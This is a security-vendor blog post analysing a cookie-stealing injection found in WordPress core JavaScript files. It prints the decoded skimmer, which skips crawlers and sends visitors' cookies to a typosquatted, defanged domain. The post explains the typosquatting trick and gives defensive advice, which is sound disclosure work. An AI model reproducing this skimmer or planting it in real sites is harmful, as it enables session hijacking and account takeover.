• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Fake WordPrssAPI Stealing Cookies and Hijacking Sessions

May 9, 2017Cesar AnjosEspanolPortugues

FacebookTwitterSubscribe

Cookies are stored in the user’s browser to track behavior on a specific website. They also keep a user logged in during the active browsing session. Without cookies a user would need to log in, in order to authenticate every action they take. Essentially, cookies keep a user logged in until they either log out or the cookie expires.

Cookie Stealing and Session Hijacking

If an attacker is able to steal active cookies, the attacker can pretend to be that user and perform any actions the user has permissions to perform. This is extremely dangerous when consider administrator users.

These types of attack are not very common because they are complex to perform and are usually time-sensitive. Most online accounts, including WordPress, will automatically log users out after a certain period of inactivity.

During an incident response investigation, we found a piece of malware pretending to be working with one of WordPress’s core domains. Hackers injected some malicious code that used typical eval(function(p,a,c,k,e,d) obfuscation at the bottom of legitimate JavaScript files, such as wp-includes/js/hoverIntent.min.js.

The Decoded Injection

Once decoded, this is how the malicious code works:

function adsadsgg() {
	var gd = document.cookie.indexOf("_utmzz=");
	if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    	var rd = Math.floor(Math.random() * 2);
    	if (rd == 0) {
        	var sss = document.createElement('script');
        	sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
        	document.body.appendChild(sss)
    	}
    	var dd = new Date();
    	dd.setTime(dd.getTime() + 86400000);
    	window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
	}
}
if (typeof(jQuery) != 'undefined') {
	jQuery(function() {
    	adsadsgg()
	})
} else {
	window.onload = function() {
    	adsadsgg()
	}
}

There is a conditional statement at the top that excludes cookies from user agents coming from search engine crawlers. This ensures that the data being sent to attackers is more likely to immediately be usable.

After ensuring the data belongs to a real user, the script gathers the active cookie data and passes it to a malicious website to be used by attackers.

Fake WordPrssAPI Domain

Within the script, you may have noticed the fake domain – code.wordprssapi[.]com – that is where the cookie data is sent.

By purchasing a domain closely resembling a legitimate website platform or service, some webmasters might overlook this in their code and assume it is an official WordPress domain (which it is not).

And by the way, code.wordpressapi[.]com (properly spelled) also has nothing to do with WordPress.

Conclusion

We have seen typos used before. It continues to be a tactic that helps hackers evade detection by website owners. This is something that all webmasters should be aware of when they are auditing their own code. Be careful and always check that a domain is legitimate, especially if it is involved in collecting or sending information to a third-party site.

Even if it was an official WordPress domain, sending cookies is always a red flag. Cookies contain a wealth of private information that should not be shared.

Due to the fact that attackers are getting more creative at hiding their tracks, a core file integrity check or website monitoring service would alert the user about the issue. For detailed instructions on how to scan and clean a hacked WordPress site, you can follow our free step-by-step guide.

FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Malware Cleanup, Permissions

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.